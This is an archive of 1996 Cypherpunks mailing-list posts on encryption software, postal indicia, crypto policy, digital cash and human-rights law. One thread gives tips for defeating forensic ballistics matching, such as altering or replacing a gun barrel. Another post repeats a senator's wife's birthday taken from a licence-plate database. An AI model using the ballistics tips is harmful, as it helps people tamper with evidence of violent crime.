Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Sun, 4 Aug 1996 16:37:48 +0800
To: cypherpunks@toad.com
Subject: WARNING: SecureDrive & PartitionMagic
Message-ID: <2.2.32.19960804064926.006b59d0@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


It seems rather obvious now, but since I learned the hard way, I figured
that I'd save the rest of you from a painful experience.

I have one HD of 1.2gb.  I created a 50mb partition at the end of the drive
using PM and encrypted it with SD14b.  I ran out of room on the secured
partition and wanted to enlarge it.  I used PM to shrink the primary
partition a little, and to enlarge the secured partition.  When I shrank the
primary, the free space on the drive appeared between the two partitions.
To enlarge the secondary, I moved it to the free space, then enlarged it on
the right.  This was BAD!  PM did its thing, but no matter what I did after
that, I couldn't get the secured partition to a usable state.  I ended up
formatting the secured partition to recover.  

After some playing, it seems that PM tries to "re-align" the data on the 2nd
partition when you move left.  That's where things get screwed up.  I tested
a few combinations, and found that everything works fine if you decrypt the
partition before moving/resizing, then re-encrypt after.

Just some friendly info.  

 
                                                     G.C.G.

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 | Geoffrey C. Grabow       |      Great people talk about ideas.       |
 | Oyster Bay, New York     |     Average people talk about things.     |
 | gcg@pb.net               |      Small people talk about people.      |
 |----------------------------------------------------------------------|
 |     PGP 2.6.2 public key available at http://www.pb.net/~wizard      | 
 |          and on a plethora of key servers around the world.          |
 |   Fingerprint =  A6 7B 67 D7 E9 96 37 7D  E7 16 BD 5E F4 5A B2 E4    |
 |----------------------------------------------------------------------|
 | That which does not kill us, makes us stranger.   - Trevor Goodchild |
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Sun, 4 Aug 1996 14:12:54 +0800
To: cypherpunks@toad.com
Subject: Future US Postal History -- Indicium to Replace Stamps (fwd)
Message-ID: <Pine.SUN.3.95.960804042839.469B-100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain



	Anybody else think this makes mail snooping a whole
	lot simpler?

---------- Forwarded message ----------
Date: Sat, 3 Aug 1996 11:28:54 -0500
From: "Philatelic.Com Email Service" <post@philatelic.com>
Subject: Future US Postal History -- Indicium to Replace Stamps

To: post@philatelic.com
Subject: Future US Postal History -- Indicium to Replace Stamps
from: dreggen@accessnv.com

Reference:  Federal Computing Week
		Volume 10, No.l 29; July 29, 1996

		Federal Computing Week (FCW) is a publication of
		FCW Government Technology Group
		3110 Fairview Park Drive  --  Suite 1040
		Falls Church, VA   22042-4599
		USA

		Tel:     703 - 876 - 5100
		Fax:    703 - 876 - 5126

		Page 19


USPS
Proposed specifications would improve mail security
	by Colleen O'Hara

The following is quote of one topic paragraph from the article:

"Defining a Postmark

	One specification defines what a postmark, or evidence of postage,
must look like.  USPS has proposed that the new postmark contain
a unique digital signature carried in a 2-D bar code.  A new indicium
substitutes for a postage stamp or postage meter impreint as evidence that
postage was paid.

	Because of the information the indicium will contain, the agency
will be better able to deter amil fraud as well as provide additional services,
such as mail tracking and tracing, according to Roy Gordon, program
manager for the agency's Information Based Indicia Program.

	'USPS' inidtial strategy is to sample [letters] in the mail stream
and scan on a random basis,' Gordon said.  'In the long term, it will
scan 100 percent of the mail to deter fraud.  The key is that it provides
the USPS [with] the ability to provide additional services to carry that
data with mail pieces.' "


	This whole article is probably a must read for anyone who is
following or who is interested in what the postal history of the
future will be like.

		Dale Eggen
		dreggen@accessnv.com

*****************************************************************
People who do not give specific references are cowards
who are trying to have an influence on peoples opinion
by the manipulation of information to suit their own will.
						William Shakespear
*****************************************************************



		
_____________________  PHILATELIC.COM-E-MAIL-SERVICE  ____________________

* To reply in PRIVATE to the sender, you MUST use their email address.
* Selecting REPLY will distribute a PUBLIC message.
* Currently reaching over 300 Dealers and Collectors with your email post!
__________________________________________________________________________

                 _/_/_/                           _/_/_/
                  _/_/_/ http://www.philatelic.com _/_/_/
                   _/_/_/                           _/_/_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sun, 4 Aug 1996 22:49:59 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: Crypto added to anti-terror bill in US at last minute?!?!!
In-Reply-To: <199608040346.XAA24376@unix.asb.com>
Message-ID: <Pine.SUN.3.91.960804055506.11179A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Congress isn't in session. It would be a genuine trick for them to pass 
any legislation before September.

-Declan


On Sat, 3 Aug 1996, Deranged Mutant wrote:

> >From ACLU's site: http://www.aclu.org/issues/cyber/terror.html 
> 
>      The latest understanding from ACLU's legislative representatives is
>      that the
>      "Anti Terrorism" bill that is expected to be acted on today and
>      tomorrow will include government controls on encryption -- a
>      scheme for key escrow of private keys for encryption. It is also
>      likely to include expanded use of wiretapping without a Court
>      order. 
> ---
> No-frills sig. Befriend my mail filter by sending a message with the subject "send help"
> Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
> Send a message with the subject "send pgp-key" for a copy of my key.
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RICHARD VINCENT <rvincent@cnmnet.com>
Date: Mon, 5 Aug 1996 10:36:11 +0800
To: "cypherpunks@toad.com>
Subject: Re: CDT Policy Post 2.25 - Senate Encrypti
Message-ID: <199608050021.TAA14904@future.cnmnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: RICHARD VINCENT * EMC.Ver #2.5.02 ] --


-------- REPLY, Original message follows --------

Date: Monday, 24-Jun-96 01:57 AM

From: Shabbir J. Safdar        \ Internet:    (shabbir@vtw.org)
To:   cypherpunks@toad.com     \ Internet:    (cypherpunks@toad.com)

Subject: Re: CDT Policy Post 2.25 - Senate Encrypti 

Damn, we've been found out.

I don't suppose anyone will notice the fact that although I've helped with
the preparation for the SAFE day, I won't actually be attending the event.

Clearly, I don't want to get caught.

-Shabbir J. Safdar * Online Representative * Voters Telecomm. Watch (VTW)
 http://www.vtw.org/ * Defending Your Rights In Cyberspace

PS On a more serious note, I can't get testimony into the record for this
hearing if you don't send it to me.  Sooo...please either fill out the form
at http://www.crypto.com/submit/ or if you find that format too constraining
, just send it to me in email.  I'll see what I can do to make sure PGP
signatures are reproduced intact in the Congressional Record.

Most everyone I know cannot simply jaunt off to D.C. for a day.  Why not at
least make your voice heard?

anonymous-remailer@shell.portal.com writes:
>WHY IS NO ONE TALKING ABOUT THIS VIOLATION OF OUR RIGHTS? EVER HERE THAT
>IN THE US VOTES ARE supposed to be *****SECRET*****??? NO MORE!
>
>Why does the vtw cdt etc want to hand over your name to the us gov? Notice
>how there's two events one on the east cost and the other on the west coast




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 5 Aug 1996 02:28:14 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <FsF5RD17w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.960804082928.19776B-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 4 Aug 1996, Dr.Dimitri Vulis KOTM asked:

> Is there truth to the rumor that poking a file inside the barrel
> will alter the marks on future test firings?

I don't know the answer to this one, but my best guess is,
A) yes, but not enough to alter the test firing, and
B) whether or not it did, it would be strong evidence of an
attempt to screw up such a test.  There are few (no?) legitimate
reasons to harm one's gun thusly.

I have heard, but have not evidence for, is that with use, these
characteristic markings change.  As a result, putting 200-300
rounds through a gun at the range is enough to alter its
identifiable barrel markings sufficiently to defeat forensic
matching.  Don't know, just heard, but it sounds reasonable.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 5 Aug 1996 00:28:44 +0800
To: cypherpunks@toad.com
Subject: Re: SOUP KITCHENS (fwd)
In-Reply-To: <199608031110.GAA12116@einstein>
Message-ID: <v03007802ae2a59dc5ea5@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:55 AM -0400 8/4/96, Alan Horowitz wrote:
> Famine and inadequate nourishment does weaken the stamina and
> survivability of individuals in the Third World, but the main problem is
> non-access to (what we consider to be) simple, basic medical modalities.
> Untold numbers of African babies die of not-very-virulent diseases,
> because they becomes fatally dehydrated. In the West, these babies
> revieve IV fluids which carries them over the critical period. In a
> village that is three days walk to a bus which takes 16 hours to get to a
> clinic that has IV needles and sterile fluids, the baby WILL die.

Actually, it's really a question more of information than transportation.
The, heh, solution to diaherrea-induced dehydration -- like the kind you
get from Cholera -- is a very simple mixture of sugar, salt, and water.
This (and, of course, the proper construction of the sanatation facilities
which caused the Cholera to begin with) is just the kind of information
which the internet can carry.

All we need is a few more cycles of Moore's law and a bunch of
microsattelite-based internet routers...

And, of course, the microcurrency system to pay for it all. :-).

It would certainly be cheaper than "Peace" Corps ecotourism...

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 5 Aug 1996 00:56:50 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
In-Reply-To: <199608040258.VAA06801@sr.radiks.net>
Message-ID: <v03007805ae2a5c9f04e9@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:06 AM -0400 8/4/96, anonymous-remailer@shell.portal.com wrote:
> You guys are confused.  The actual telephone call may cost only 2
> cents/min, but the accounting and billing procedures are way more
> expensive.  As long as they are doing any kind of usage-based
> charging, that actual act of charging will continue to cost
> considerably more than the data transmission.

Ah. So, why settle the transactions for digital cash and skip all that
overhead? Yet another application for micromoney.

It seems to me that I've been arguing -- for two years now -- that digital
bearer certificate settlement will prove to be *much* cheaper than
book-entry settlement, and here the answer's been looking at us, straight
in the face, all this time.

Anybody have any ideas how to go about measuring the savings between
accumulating, storing, and processing call-billing data and simply paying
for them  before/during/after the call with digital cash?

I hear this strange rumbling underground. Hey, isn't that "Dad" Joiner?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Mon, 5 Aug 1996 00:27:13 +0800
To: cypherpunks@toad.com
Subject: Re: [Noise] Future US Postal History...
In-Reply-To: <Pine.SUN.3.95.960804042839.469B-100000@netcom>
Message-ID: <rogeru3uj41ly.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> jonathon  <grafolog@netcom.com> writes:

  > 	'USPS' inidtial strategy is to sample [letters] in the mail stream
  > and scan on a random basis,' Gordon said.  'In the long term, it will
  > scan 100 percent of the mail to deter fraud...

Of course, there's little point in doing this as long as anonymous
post boxes still exist, so...

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 5 Aug 1996 03:12:20 +0800
To: Sandy Sandfort <dlv@bwalk.dm.com>
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <199608041735.KAA21449@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:37 AM 8/4/96 -0700, Sandy Sandfort wrote:

>
>On Sun, 4 Aug 1996, Dr.Dimitri Vulis KOTM asked:
>
>> Is there truth to the rumor that poking a file inside the barrel
>> will alter the marks on future test firings?

>I have heard, but have not evidence for, is that with use, these
>characteristic markings change.  As a result, putting 200-300
>rounds through a gun at the range is enough to alter its
>identifiable barrel markings sufficiently to defeat forensic
>matching.  Don't know, just heard, but it sounds reasonable.

Heard same thing here; it's almost certainly true.  It would help if the gun 
got a thorough cleaning as well:  You can "de-copper" a barrel by plugging 
one end, and filling the barrel with an ammonia solution. (this is available 
as a commercial product for guns, at wildly-inflated prices.  Ordinary 
ammonia solution works just as well, cheap.)   This dissolves the copper 
left from the passage of copper/brass-jacketed bullets.  You can tell it's 
working:  The copper forms the distinctive blue cupramine ion in solution.


BTW, all this changes is the microstructure of the markings:  The number of 
riflings and the twist of the riflings are, obviously, unchanged.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.K.Merriman.-.webmaster@toad.com,       "shellback.com" <merriman@amaonline.com>
Date: Mon, 5 Aug 1996 03:52:21 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <199608041807.LAA11271@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com, sandfort@crl.com
Date: Sun Aug 04 13:07:42 1996
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Sun, 4 Aug 1996, Dr.Dimitri Vulis KOTM asked:
> 
> > Is there truth to the rumor that poking a file inside the barrel
> > will alter the marks on future test firings?
> 
> I don't know the answer to this one, but my best guess is,
> A) yes, but not enough to alter the test firing, and
> B) whether or not it did, it would be strong evidence of an
> attempt to screw up such a test.  There are few (no?) legitimate
> reasons to harm one's gun thusly.
> 
> I have heard, but have not evidence for, is that with use, these
> characteristic markings change.  As a result, putting 200-300
> rounds through a gun at the range is enough to alter its
> identifiable barrel markings sufficiently to defeat forensic
> matching.  Don't know, just heard, but it sounds reasonable.
> 
> 

Considering the relative strengths/hardnesses of the metals involved 
(high-grade steel for barrel, lead and/or copper for projectile), I'd 
suspect that it would take more than 200-300 rounds to have any significant 
impact on the barrel rifling. This, of course, is for 'normal' weapons and 
ammo; using diamond projectiles in a saturday night special voids all 
warranties, express or implied :-)

my ha'penny's worth.

Dave Merriman

PS - Been using Pronto Secure beta software the last couple of days for 
email. It's not Eudora, but *very* convenient for signing/encrypting. A 
couple of bugs/gotchas, but nothing I'd expect to see in for-sale version.
I'm actually mildly impressed with how smoothly and transparently it works 
with PGP on a DOS/Win95 system.
PGP Email welcome and encouraged. Visit my web site at
http://www.shellback.com/p/merriman
for my PGP key and fingerprint
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgQwKsVrTvyYOzAZAQGacAP+L8CfV6aFmuAsJYTM5ttHqWu6B49vL2cx
Ejnxwp2bRcM7winGALg+LQwwqjx1eNd1gKLsjrIRdh4oQgCBobfdEMU2poJvceTD
shfPhvZqDWQQgZf0B1OkqzporGprdKM6V/rEbguzDMGt1SaUX585dZaYq5/CtyOO
b+NFH+WSemc=
=VWgA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Mon, 5 Aug 1996 03:02:39 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <FsF5RD17w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.95.960804121342.4158A-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


    Nitric Acid wii change barrelling.


On Sun, 4 Aug 1996, Dr.Dimitri Vulis KOTM wrote:

> JonWienk@ix.netcom.com writes:
> > Incidentally, one of the interesting traits of a shotgun is that buckshot is
> > subject to the ballistics matching techniques used on rifle and pistol bullet
> > The plastic wads (which prevent the shot from touching the barrel) do not tak
> > the microscopically detailed impressions from the barrel that copper or lead
> > bullets do. The heat from firing always melts the plastic slightly--enough to
> > defeat this.  Of course, if you leave the fired shells lying around, the prim
> > and ejector marks can bite you...
> 
> Is there truth to the rumor that poking a file inside the barrel will
> alter the marks on future test firings?
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 5 Aug 1996 05:29:56 +0800
To: cypherpunks@toad.com
Subject: Re: TrustBucks
In-Reply-To: <htrb56rmj9@nowhere.com>
Message-ID: <199608041939.MAA03317@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


An interesting idea.  It reminds me of a barter system, with the similar
problem of trying to put together a complex trade which is mutually
acceptable.  I wonder whether it could be automated if people posted
their holdings and what they would accept.  Then software could go into
this database and try to put together a set of trades that will let
someone make a purchase.  However it would seem to be very harmful to
privacy to have to post all this information.

There are some "lightweight payment" schemes out there which have the
property that people only accept cash that is "for them".  Sometimes
there is a broker involved who actually issues the cash on behalf of the
merchant (the merchant trusts the broker to do this) so that customers
need only go to a smaller number of brokers.  Then these systems can be
based on heavier payment systems like digicash or credit cards which
people use to open accounts with the brokers.

I do like the decentralization idea, but these lightweight schemes have
some of the same advantages.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Allen Robinson" <sebago@earthlink.net>
Date: Mon, 5 Aug 1996 04:42:54 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <199608041900.MAA04859@serbia.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Rather than resorting to such extreme measures as attacking the interior 
of the existing barrel with a file or nitric acid, simply replace the 
barrel with a new one (normally not prohibitively expensive), then put a 
few hundred rounds through the new barrel at the range so that it appears
used when/if examined.

Naturally this does not address the possibility of unique marks made on 
the primer by the firing pin, on the cartridge by the ejector, etc.

AR

#%#%#%#%#%#%#%#%#%#%#%#%#%#%#%
"In the end, more than they wanted freedom, they wanted
security.  When the Athenians finally wanted not to give to
society but for society to give to them, when the freedom
they wished for was freedom from responsibility, then Athens
ceased to be free."  - Edward Gibbon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allen Robinson.........................sebago@earthlink.net
PGP public key FE4A0A75
fingerprint 170FBC1F7609B76F 967F1CC8FCA7A41F




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 5 Aug 1996 06:48:46 +0800
To: cypherpunks@toad.com
Subject: Re: "And who shall guard the guardians?" [NOISE]
Message-ID: <199608042050.NAA12499@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Arun and Marin have been quoting from UN docs and the
>International Covenant on Civil and Political Rights(ICCPR),
>http://www.pluggedin.org/amnesty/rights4.htm
> which the US *ratified* not so long ago.

>2. Everyone shall have the right to freedom of expression;
>this right shall include freedom to seek, receive and impart
>information and ideas of all kinds, regardless of frontiers,
>either orally, in writing or in print, in the form of art, or
>through any other media of his choice.
>3. The exercise of the rights provided for in paragraph 2
>of this article carries with it special duties and
>responsibilities. It may therefore be subject to certain
>restrictions, but these shall only be such as are provided by law
>and are necessary:
>(a) For respect of the rights or reputations of others;
>(b) For the protection of national security or of 
>public order (ordre public), or of public health or morals. 
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^        ^^^^^^           ^^^^^^^

Lots of UN declarations of rights have this sort of exception;
"protection of public morals" is something so blatantly vague
and broad that if a government contends that such a concept exists, 
as the covenant does, it could probably force the World Court
to conclude that it permits them to declare as "necessary"
just about anything short of burning witches and heretics,
and humanely beheading heretics, drug dealers, and anonymous remailer
operators is probably ok by this standard.

The UN Declaration (or was it Convention) on the Rights of the Child
is even worse - it strongly states the right to believe in and
practice religion, except when the government needs to interfere
to protect public morals or public order...  On the other hand,
it provides no such exception for the right to mandatory public
education or identity registration.
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 5 Aug 1996 06:36:29 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: More to be paranoid about...
Message-ID: <199608042050.NAA12505@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:14 PM 8/3/96 -0700, you wrote:
>Take a look at:
>     http://www.spiritone.com/cgi-bin/plates
>Feed it an Oregon licence plate number and it will feed you back all sorts
>of info about the person/victim.

It's interesting to know that Senator Hatfield's wife's birthday
is 1/17/29, and that the title to the car is held with a 
security interest by the US SENATE EMPLOYEES FEDERAL CREDIT,
and that (at least) Social Security Numbers weren't listed
for the plates I checked.  Also that, unlike many states,
the Governor doesn't have License Plate #1.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 5 Aug 1996 06:32:18 +0800
To: cypherpunks@toad.com
Subject: Re: FAA to require transponders on all aircraft passengers
Message-ID: <199608042050.NAA12512@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 3:21 PM 8/3/96, David Lesher wrote:
>>They are going to hang one of these on EVERY bag?
>>At what per-unit cost?
Probably low enough, at least if they can reuse the tags
(should be easy to find them, since they're transponder-equipped.)

My guess about how they'll be used is to replace the bar-code
stickers used by many baggage-handling systems - they'll stick
one on at checkin, corresponding to the number on your ticket,
track them when they load them on the plane (so they know
that all the bags correspond to people expected to get on the plane,
as well as knowing the bags are getting on the correct plane),
and track the tickets to make sure that all the people expected 
to get on the plane actually do get on (I think they use bar-code
readers or OCR today, and that'll probably continue.)

Tim> "bag escrow" will allow other agencies--such as DEA--to sniff

Also useful for the baggage checkers at the baggage claim, 
who'll be able to check that your baggage tag belongs to your
ticket, and that nobody sneaks baggage out unchecked,
either stealing it or trying to pick up the contraband.
Of course they'll _have_ to check all the bags to collect
the transponders.

David>>THEN think of the RFI problems.....

Tim> The RFI problems are actually the least of the concerns, 
Tim> given the "code space" technology which is possible.

The RFI issue isn't just telling one transponder from another,
it's interference with the airplane's electronics.  The devices
will be a bit quieter than your laptop, since they presumably
only broadcast in response to polls - probably quieter than
pagers but noisier than digital watches.


                                Bill


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 5 Aug 1996 06:34:49 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Telephony costs $2
Message-ID: <199608042050.NAA12518@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:09 PM 8/3/96 -0800, Jim Bell talked about mixing telephony,
voice compression, and modem functions on future modems,
and how doing a 28.8 modem uses up most of a DSP chip,
while 2400bps voice coding and decoding also each use up about half,
making full duplex tough.

One advantage of higher-speed modems is that you can get away with
16kbps ADPCM coding, which is dirt-simple computationally;
your 386 probably has enough horsepower to do it, though a PC's
interrupt structure may make it tough to shove all the data in and
out in real time.  You still need a sound card that'll do the
A/D and D/A conversion simultaneously if you want full-duplex;
that wasn't part of the original market vision of Soundblaster,
so vanilla sound cards don't all do it.  It also has the advantage
that the data is being moved through your CPU, so encryption is
an easy add-on, rather than having one combined modem/voiceblaster
card which doesn't have any hooks for crypto or other processing.

>Sure,  it may not be necessary to compress voice audio all the way down to 
>2400 bps, since the current modem standards allow 28.8kbps and beyond, but I 
>suggest that decreasing net traffic by a factor of 12 (28.8k to 2.4k) is a 
>desirable goal.  

One problem is that tighter compression methods are far more sensitive
to network latency than crude ones, and need to process more milliseconds
of speech before putting out a packet on the net (e.g. a 64-byte tinygram
is 200ms of speech at 2400bps, vs. 32ms at 16kbps.)  For modem-to-modem
communications, this is no problem; for Internet random delays it is.

Also, another big difficulty with full-duplex transmission is that you
need echo-cancelling, especially with high-latency circuits.
Half-duplex is annoying, but it doesn't echo, and it's more tolerant
of delay because you're not expecting it to have natural timing...

>The reason I think a system I've described has a future is that modem 
>manufacturers have a PROBLEM.  Their problem is that they've pretty much run 
>out of room to improve the bit-pushing through a 3 KHz bandwidth.  

Given that the "3KHz" is almost universally transmitted over 64kbps
digital channels, there's really no point in pushing past 33.6 with
analog-based coding; better to just do ISDN.  (You can still do analog-only
calls if you're on an analog central office talking to someone else
at the same exchange, but it'd be a flat-rate local call anyway.
If there's anybody still using analog trunks between offices, 
it's some mom&pop rural telco, and you can't get 28.8 on barbed-wire...)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 5 Aug 1996 06:41:36 +0800
To: cypherpunks@toad.com
Subject: Re: The Hazards of Reading Naughty Newsgroups at Work
In-Reply-To: <199608031945.MAA22460@jobe.shell.portal.com>
Message-ID: <Pine.GUL.3.95.960804135637.9417B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 3 Aug 1996 anonymous-remailer@shell.portal.com wrote:

> The following interesting article appeared on page 6 of the
> August 3, 1996 Seattle Times.
[...]
> Rosul is also charged with possession of child pornography.  He
> allegedly used Microsoft equipment to manufacture a CD-ROM disk
> containing child pornography.
> 
> Both Seaman and Rosul will be arraigned next week in King County
> Superior Court.  If convicted, both could receive up to one year in
> jail.

"Where do you want to go today?"

> Microsoft spokesman Mark Murray said the company found out about the
> activities of its two former employees last year and alerted police.
> 
> "We provided the police with the computers to pull up the evidence,"
> Murray said.

I couldn't help thinking of the poor technical schmucks whose job it was
to spy on their co-workers.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 5 Aug 1996 07:28:17 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Message Broadcast
Message-ID: <199608042120.OAA12926@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:58 PM 8/3/96 -0400, Laszlo Vecsey <master@internexus.net> wrote:
>Has anyone implemented a simple anonymous chat system (an anonymous irc)
>using the technique described in Applied Cryptography 2nd edition? I'm
>speaking of the Anonymous Message Broadcast documented in section 6.3, it
>begins on page 137.

A lot of people talk about Dining Cryptographers networks, but I'm not
aware of more than an occasional test implementation - the concept is
simple, but getting all the details right is a lot of work,
including things like collision detection, and there aren't a lot of
good uses for the things to motivate development, even though they
are basically cool.  

One design approach is to use IRC; another is email.
IRC probably requires that all the participants be on simultaneously,
or requires a coordination system to handle whoever's on right now.


>Can the same system be implemented using base256 (unsigned char, 8bit ASCII)
>instead of the simple on/off binary method that is described in the
>explanation? How would it differ.

Rather than doing Base256, just XOR the bytes; you get the speed of
doing things a byte or word at a time, while still getting bitwise changes.
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sun, 4 Aug 1996 20:11:50 +0800
To: Martin Minow <cypherpunks@toad.com
Subject: Re: "And who shall guard the guardians?"
Message-ID: <1.5.4.32.19960804094852.00304850@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 03/08/96 -0700, Martin Minow wrote:

>Does the English Only bill conflict with the UN Declaration of
>Human Rights (Article 2):
..
>For that matter, does the escrowed crypto legislation conflict with
>Article 12:
..
>My understanding is that the United States is (finally) a signatory
>to the Declaration.

A couple of points need clarification:

A Declaration isn't, in international law, binding. A covenant
is, provided you haven't just signed it but also ratified it
(i.e. made it a part of national law). So the Universal
Declaration of Human Rights is basically just a statement of good
intentions. Much more important, legally, is the International
Covenant on Civil and Political Rights(ICCPR),
http://www.pluggedin.org/amnesty/rights4.htm
 which the US *ratified* not so long ago.

Says the ICCPR 

Article 17 

1. No one shall be subjected to arbitrary or unlawful
interference with his privacy, family, home or correspondence,
nor to unlawful attacks on his honour and reputation.
2. Everyone has the right to the protection of the law
